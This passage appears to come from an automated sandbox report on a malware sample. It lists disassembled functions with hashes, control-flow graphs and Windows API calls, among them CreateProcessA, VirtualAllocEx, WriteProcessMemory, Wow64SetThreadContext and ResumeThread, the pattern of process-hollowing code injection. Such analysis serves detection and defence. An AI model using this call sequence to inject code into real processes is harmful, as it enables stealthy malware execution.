                                                              • API String ID:
                                                              • Opcode ID: 6e2c39464cafa6034c4600e7de505e69a7b607d0ef13e5c007d049d875f2e5eb
                                                              • Instruction ID: dfdd2bb4fa61c164c116b9ca451ce00d53d8b744f7da8441a5b7f6adffb2cdb5
                                                              • Opcode Fuzzy Hash: 6e2c39464cafa6034c4600e7de505e69a7b607d0ef13e5c007d049d875f2e5eb
                                                              • Instruction Fuzzy Hash: 9E71E571D45229CBEB28CF66C8447EDBBFABF89300F10D1AAD518A6351EB705A85CF44
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2149731358.000000000B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b7f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07048e53649033d6834f6d14bf15d88f4d85def333c6ea6b9b32985b2d95b64e
                                                              • Instruction ID: bb63469e4bb004ec56f26a16d9eaff88097ff26dd3c05c77119b6c0c63ce9b8a
                                                              • Opcode Fuzzy Hash: 07048e53649033d6834f6d14bf15d88f4d85def333c6ea6b9b32985b2d95b64e
                                                              • Instruction Fuzzy Hash: B7E086B484D246DFCB51DF6495445F47FBCAB07604F002085E469A7313D9314941DF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1343 70ec424-70ec4c5 1346 70ec4fe-70ec51e 1343->1346 1347 70ec4c7-70ec4d1 1343->1347 1352 70ec557-70ec586 1346->1352 1353 70ec520-70ec52a 1346->1353 1347->1346 1348 70ec4d3-70ec4d5 1347->1348 1350 70ec4f8-70ec4fb 1348->1350 1351 70ec4d7-70ec4e1 1348->1351 1350->1346 1354 70ec4e5-70ec4f4 1351->1354 1355 70ec4e3 1351->1355 1363 70ec5bf-70ec679 CreateProcessA 1352->1363 1364 70ec588-70ec592 1352->1364 1353->1352 1357 70ec52c-70ec52e 1353->1357 1354->1354 1356 70ec4f6 1354->1356 1355->1354 1356->1350 1358 70ec530-70ec53a 1357->1358 1359 70ec551-70ec554 1357->1359 1361 70ec53e-70ec54d 1358->1361 1362 70ec53c 1358->1362 1359->1352 1361->1361 1366 70ec54f 1361->1366 1362->1361 1375 70ec67b-70ec681 1363->1375 1376 70ec682-70ec708 1363->1376 1364->1363 1365 70ec594-70ec596 1364->1365 1367 70ec598-70ec5a2 1365->1367 1368 70ec5b9-70ec5bc 1365->1368 1366->1359 1370 70ec5a6-70ec5b5 1367->1370 1371 70ec5a4 1367->1371 1368->1363 1370->1370 1372 70ec5b7 1370->1372 1371->1370 1372->1368 1375->1376 1386 70ec70a-70ec70e 1376->1386 1387 70ec718-70ec71c 1376->1387 1386->1387 1388 70ec710 1386->1388 1389 70ec71e-70ec722 1387->1389 1390 70ec72c-70ec730 1387->1390 1388->1387 1389->1390 1391 70ec724 1389->1391 1392 70ec732-70ec736 1390->1392 1393 70ec740-70ec744 1390->1393 1391->1390 1392->1393 1396 70ec738 1392->1396 1394 70ec756-70ec75d 1393->1394 1395 70ec746-70ec74c 1393->1395 1397 70ec75f-70ec76e 1394->1397 1398 70ec774 1394->1398 1395->1394 1396->1393 1397->1398 1400 70ec775 1398->1400 1400->1400
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070EC666
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 2a59a9de868544b5ae5e7456cc1d41b86a68522dfecf5bd9a3d435ece1bda1c2
                                                              • Instruction ID: a836d2c67973e3a4e465a597155a2b211b00549b195d7ab0295574a6e529c43b
                                                              • Opcode Fuzzy Hash: 2a59a9de868544b5ae5e7456cc1d41b86a68522dfecf5bd9a3d435ece1bda1c2
                                                              • Instruction Fuzzy Hash: 6CA15FB1D00219CFEB54CF68C841BEEBBF6BF48310F1482A9D859A7250DB759985CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1401 70ec430-70ec4c5 1403 70ec4fe-70ec51e 1401->1403 1404 70ec4c7-70ec4d1 1401->1404 1409 70ec557-70ec586 1403->1409 1410 70ec520-70ec52a 1403->1410 1404->1403 1405 70ec4d3-70ec4d5 1404->1405 1407 70ec4f8-70ec4fb 1405->1407 1408 70ec4d7-70ec4e1 1405->1408 1407->1403 1411 70ec4e5-70ec4f4 1408->1411 1412 70ec4e3 1408->1412 1420 70ec5bf-70ec679 CreateProcessA 1409->1420 1421 70ec588-70ec592 1409->1421 1410->1409 1414 70ec52c-70ec52e 1410->1414 1411->1411 1413 70ec4f6 1411->1413 1412->1411 1413->1407 1415 70ec530-70ec53a 1414->1415 1416 70ec551-70ec554 1414->1416 1418 70ec53e-70ec54d 1415->1418 1419 70ec53c 1415->1419 1416->1409 1418->1418 1423 70ec54f 1418->1423 1419->1418 1432 70ec67b-70ec681 1420->1432 1433 70ec682-70ec708 1420->1433 1421->1420 1422 70ec594-70ec596 1421->1422 1424 70ec598-70ec5a2 1422->1424 1425 70ec5b9-70ec5bc 1422->1425 1423->1416 1427 70ec5a6-70ec5b5 1424->1427 1428 70ec5a4 1424->1428 1425->1420 1427->1427 1429 70ec5b7 1427->1429 1428->1427 1429->1425 1432->1433 1443 70ec70a-70ec70e 1433->1443 1444 70ec718-70ec71c 1433->1444 1443->1444 1445 70ec710 1443->1445 1446 70ec71e-70ec722 1444->1446 1447 70ec72c-70ec730 1444->1447 1445->1444 1446->1447 1448 70ec724 1446->1448 1449 70ec732-70ec736 1447->1449 1450 70ec740-70ec744 1447->1450 1448->1447 1449->1450 1453 70ec738 1449->1453 1451 70ec756-70ec75d 1450->1451 1452 70ec746-70ec74c 1450->1452 1454 70ec75f-70ec76e 1451->1454 1455 70ec774 1451->1455 1452->1451 1453->1450 1454->1455 1457 70ec775 1455->1457 1457->1457
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070EC666
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: c6a98dccf8c4de418004d4af440ef798c3ecf2dfd6ae5d707130d421b978ec9f
                                                              • Instruction ID: 9b93f4ebe370799c222541caf08736ed2245cb0301183c38ce73a8892a50aa73
                                                              • Opcode Fuzzy Hash: c6a98dccf8c4de418004d4af440ef798c3ecf2dfd6ae5d707130d421b978ec9f
                                                              • Instruction Fuzzy Hash: 21915FB1D00219CFEB54CF69C840BEEBBF6BF48310F1482A9D859A7250DB759985CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1556 52b2a04-52b2a76 1557 52b2a78-52b2a7e 1556->1557 1558 52b2a81-52b2a88 1556->1558 1557->1558 1559 52b2a8a-52b2a90 1558->1559 1560 52b2a93-52b2acb 1558->1560 1559->1560 1561 52b2ad3-52b2b32 CreateWindowExW 1560->1561 1562 52b2b3b-52b2b73 1561->1562 1563 52b2b34-52b2b3a 1561->1563 1567 52b2b80 1562->1567 1568 52b2b75-52b2b78 1562->1568 1563->1562 1569 52b2b81 1567->1569 1568->1567 1569->1569
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052B2B22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 134be40a917a73d81e4436899cd89494fb4bc6242c5492ab9b164d68d0f58db6
                                                              • Instruction ID: a6f487ecc7f78e15e7a98d7e2ef1559fbd08c033c57c020236ef1ed5bf58a4b7
                                                              • Opcode Fuzzy Hash: 134be40a917a73d81e4436899cd89494fb4bc6242c5492ab9b164d68d0f58db6
                                                              • Instruction Fuzzy Hash: F251C2B5D10349DFDB14CFAAC884ADEBBB1BF48350F24852AE819AB210D7759845CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1570 52b17d0-52b2a76 1572 52b2a78-52b2a7e 1570->1572 1573 52b2a81-52b2a88 1570->1573 1572->1573 1574 52b2a8a-52b2a90 1573->1574 1575 52b2a93-52b2b32 CreateWindowExW 1573->1575 1574->1575 1577 52b2b3b-52b2b73 1575->1577 1578 52b2b34-52b2b3a 1575->1578 1582 52b2b80 1577->1582 1583 52b2b75-52b2b78 1577->1583 1578->1577 1584 52b2b81 1582->1584 1583->1582 1584->1584
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 052B2B22
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 1dac300b91cf8dd537d7feda1a3f955addaa3828ed02c97ca838d6cc95f92d81
                                                              • Instruction ID: d4303bf854177b4e32ada7c75cab938bbb3c8d49debd26b4d77b3f06dc7ffbd2
                                                              • Opcode Fuzzy Hash: 1dac300b91cf8dd537d7feda1a3f955addaa3828ed02c97ca838d6cc95f92d81
                                                              • Instruction Fuzzy Hash: A051D0B5D10349DFDB14CF9AC884ADEBBF5BF48350F24852AE819AB210D7B5A841CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1694 2bf5d44-2bf5d4e 1695 2bf5d50-2bf5e11 CreateActCtxA 1694->1695 1697 2bf5e1a-2bf5e74 1695->1697 1698 2bf5e13-2bf5e19 1695->1698 1705 2bf5e76-2bf5e79 1697->1705 1706 2bf5e83-2bf5e87 1697->1706 1698->1697 1705->1706 1707 2bf5e89-2bf5e95 1706->1707 1708 2bf5e98 1706->1708 1707->1708 1710 2bf5e99 1708->1710 1710->1710
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 02BF5E01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2144315872.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bf0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 92ce69f01f469ed2f5386fd0d64ad572886310cdeec1b54d68db113872401ec6
                                                              • Instruction ID: a4508f2b6c2a1ed83b7f0731059e7ad5db911498e88f1df3428c9d1dac60a5ec
                                                              • Opcode Fuzzy Hash: 92ce69f01f469ed2f5386fd0d64ad572886310cdeec1b54d68db113872401ec6
                                                              • Instruction Fuzzy Hash: 7441E3B0C00719CFEB25CFA9C884B8EBBB5BF49304F14819AD509AB255DB756949CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 052B50A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2147454333.00000000052B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_52b0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 958930960b5050c9c9b4ac97a7b4b08c17375d62109f8dcf5e58a957f6aca259
                                                              • Instruction ID: ed7384ca4318955888e57dec5b2b2d58f68ad3a29e46f54e4509260a26362a96
                                                              • Opcode Fuzzy Hash: 958930960b5050c9c9b4ac97a7b4b08c17375d62109f8dcf5e58a957f6aca259
                                                              • Instruction Fuzzy Hash: 8B4108B4A10245CFDB14DF99C488AAABBF5FF8C314F24C859D519AB321D7B5A841CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 02BF5E01
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2144315872.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bf0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 58208221b175156ec7dae16c437abfc87f6b3f3291747e40469e4ff1619298f0
                                                              • Instruction ID: 0bac62b2f0a66b91a0760e09fb907feac1ad4e178e5406a64f14e48727ca6b8d
                                                              • Opcode Fuzzy Hash: 58208221b175156ec7dae16c437abfc87f6b3f3291747e40469e4ff1619298f0
                                                              • Instruction Fuzzy Hash: 1941E2B0C0061DCBDB24DFA9C884B9EBBF5BF48304F60806AD509AB255DBB56949CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070EC238
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 58c9fe9c4fb235ac1b8fca8d970ff9aa055442ed273ac59e60ff5696ffd26966
                                                              • Instruction ID: 0df23c69592d5f8135d9ab0fadec344027e4fca0eaa17afd9fbaac98dc435749
                                                              • Opcode Fuzzy Hash: 58c9fe9c4fb235ac1b8fca8d970ff9aa055442ed273ac59e60ff5696ffd26966
                                                              • Instruction Fuzzy Hash: 7D2137B1900259DFDB10DFAAC981BEEBBF5FF48310F10852AE919A7240D779A554CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 070EC238
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 7ea5d5254575c897aec0f912d4b74f383021187f69e39feca84883c3027ea920
                                                              • Instruction ID: d69c5076f21fdac0c9b6a487f86c2bc4dd5b6906f9245aa5a8380a2981af9aa2
                                                              • Opcode Fuzzy Hash: 7ea5d5254575c897aec0f912d4b74f383021187f69e39feca84883c3027ea920
                                                              • Instruction Fuzzy Hash: C62127B1900359DFDB10DFAAC985BEEBBF5FF48310F10842AE919A7240C7799954DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070EC08E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: d9768811863a46c101fd76bad82a72c0d25d7fd685748079f60d96d96dfb68a3
                                                              • Instruction ID: bb727ee9ba06c27a24e96f49aab53ef34386e2fb5a35a0e7aca2048f723e6cfa
                                                              • Opcode Fuzzy Hash: d9768811863a46c101fd76bad82a72c0d25d7fd685748079f60d96d96dfb68a3
                                                              • Instruction Fuzzy Hash: 602159B19002098FDB10DFAAC484BAFBBF4EF48310F108429D519A7240CB79A944CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070EC318
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: ae25b00904b8a394cbdd20b6d1482707ac1b60caed2285188dc19246661ad6d7
                                                              • Instruction ID: c2f43a0e6e7e32b36b463f66a78a8425aa0f73358b1b48761f013968d69279d9
                                                              • Opcode Fuzzy Hash: ae25b00904b8a394cbdd20b6d1482707ac1b60caed2285188dc19246661ad6d7
                                                              • Instruction Fuzzy Hash: 13214AB1800259DFCB10DFAAC980AEEFBF5FF48310F50852AE519A3250C739A550CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02BFE366,?,?,?,?,?), ref: 02BFE427
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2144315872.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bf0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: ae2994b49aba9ea8ec53743fa3577cd6104fe895fe143f6f1a8804a1433ab8b9
                                                              • Instruction ID: 081978f8111f78671f62242baaffff0f3809a65f84e2dd869a430792c8c5dc9f
                                                              • Opcode Fuzzy Hash: ae2994b49aba9ea8ec53743fa3577cd6104fe895fe143f6f1a8804a1433ab8b9
                                                              • Instruction Fuzzy Hash: A521E4B5900248DFDB10CF9AD984AEEFBF9FB48310F14845AE918A3350D379A954CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 070EC318
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: e827a904a5e8acecda543654a89ea81557cfb5a6fc37097c2f75c2c327ae5ee3
                                                              • Instruction ID: 205ebb90fca53161629ceed2774bbf3313e516e7baad3531dbe0816261e68a9a
                                                              • Opcode Fuzzy Hash: e827a904a5e8acecda543654a89ea81557cfb5a6fc37097c2f75c2c327ae5ee3
                                                              • Instruction Fuzzy Hash: C02125B18002599FDB10DFAAC881AEEBBF5FF48310F50842AE519A7250C7399940DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070EC08E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: d7e3d7c0738fcb5c5ebd878380907bef5e33af2994db87e00d4629db7a42e86f
                                                              • Instruction ID: 56dec857292a4fbb1f7c1fab64ce019445e1f5c4859ffd654851328a94a46024
                                                              • Opcode Fuzzy Hash: d7e3d7c0738fcb5c5ebd878380907bef5e33af2994db87e00d4629db7a42e86f
                                                              • Instruction Fuzzy Hash: 872118B19003098FDB10DFAAC4857AFBBF4EF88324F148429D559A7241CB799945CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070EC156
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 660d842abac18894329d8db96d335d0cbe9ff750e3a93fb1e215c8049d951a09
                                                              • Instruction ID: 42fec38567043f9e26b16d1767e136d9701edc44e4301d641911466b5faca620
                                                              • Opcode Fuzzy Hash: 660d842abac18894329d8db96d335d0cbe9ff750e3a93fb1e215c8049d951a09
                                                              • Instruction Fuzzy Hash: 61115CB18002499FDB10DFAAC844AEFBFF5FF49710F108819E519A7250C7759550CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02BFC1A1,00000800,00000000,00000000), ref: 02BFC3B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2144315872.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bf0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: c88e36ad5331a99ea754329ef41bdbf19d17894c2a5d71a2b52f6ab84a746edc
                                                              • Instruction ID: 3a8b97d08bbf2328e707a94db50dc50062392446cd90ff9094591a4ac6633911
                                                              • Opcode Fuzzy Hash: c88e36ad5331a99ea754329ef41bdbf19d17894c2a5d71a2b52f6ab84a746edc
                                                              • Instruction Fuzzy Hash: 9C11F3B69003499FDB10DF9AD444ADEFFF5EB48310F10846AE519A7340C379A989CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070EC156
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: ed762f21331e197d29bed81313624c6a084ce14d15cefb6cc1cd293d04a66144
                                                              • Instruction ID: 9ee73a0513e8558aa6955ae551366f4d1a74f06a97babc455364aeea025b8347
                                                              • Opcode Fuzzy Hash: ed762f21331e197d29bed81313624c6a084ce14d15cefb6cc1cd293d04a66144
                                                              • Instruction Fuzzy Hash: 12114CB1800249DFDB10DFAAC844ADFBFF5EF49310F108419E519A7250C7759540CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 2182fad927e74d60f2f345ea33c9f0a9acdb0a197a2e2ee5b84437fef1866c68
                                                              • Instruction ID: 6a9b9877e688f7c3ceaf555ecbff2c17cd1ba2e7f33f165f41abf8e6fbb02a84
                                                              • Opcode Fuzzy Hash: 2182fad927e74d60f2f345ea33c9f0a9acdb0a197a2e2ee5b84437fef1866c68
                                                              • Instruction Fuzzy Hash: 491149B19002498FCB10DFAAC484BAEFFF5EF88310F148819D519A7240CB39A544CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2148191129.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_70e0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 240cff4b62ff3208a5651255da673d7ed9ea4f5f3f2b17ddf0dea4a9f7db9672
                                                              • Instruction ID: dc573edc8f6addd2925816ed6a71ed51a53b56b976c401bacf1e4affd6fb0f0e
                                                              • Opcode Fuzzy Hash: 240cff4b62ff3208a5651255da673d7ed9ea4f5f3f2b17ddf0dea4a9f7db9672
                                                              • Instruction Fuzzy Hash: DD113AB1D002498FCB10DFAAC445BAFFBF9EF88320F108819D519A7250CB79A544CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0B7F1165
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2149731358.000000000B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b7f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 6053b8b3c3edf1a640c9901bc52b889d79dd1824cb618cfbe0e0778aa9d3dcfe
                                                              • Instruction ID: dd8c994ae98becacf3e9edb7c3bf1e4c0ce3cac1962cdaec305b488a2f0b9c50
                                                              • Opcode Fuzzy Hash: 6053b8b3c3edf1a640c9901bc52b889d79dd1824cb618cfbe0e0778aa9d3dcfe
                                                              • Instruction Fuzzy Hash: F611F5B5800249DFCB10DF9AD885BDEBBF8EB49320F10841AE559A7600D375A544CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02BFC126
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2144315872.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2bf0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: c5b2f3be6be27940844e707f11567828a439ee82ea0793ec38fe051ce5b9c72f
                                                              • Instruction ID: 8c617bc1873aa672002c5cfc0f62015dda8f8bae06e0fba6eb0d08243f6df15f
                                                              • Opcode Fuzzy Hash: c5b2f3be6be27940844e707f11567828a439ee82ea0793ec38fe051ce5b9c72f
                                                              • Instruction Fuzzy Hash: 121110B6C002498FDB10DF9AC844ADEFBF4EF89314F10845AD519B7200C379A689CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostMessageW.USER32(?,?,?,?), ref: 0B7F1165
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2149731358.000000000B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b7f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: b9c53147ffba430377f9ba55cb1553592f9af7fb08d2800421a6729cf85dd52d
                                                              • Instruction ID: c1ddefcb522c6472a79ae53bf699b10fd7c7b7948cb6cc9db1e2ef568243f387
                                                              • Opcode Fuzzy Hash: b9c53147ffba430377f9ba55cb1553592f9af7fb08d2800421a6729cf85dd52d
                                                              • Instruction Fuzzy Hash: 3011D0B5800349DFDB10DF9AD885BDEBBF8EB48320F10885AE559A7740C379A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
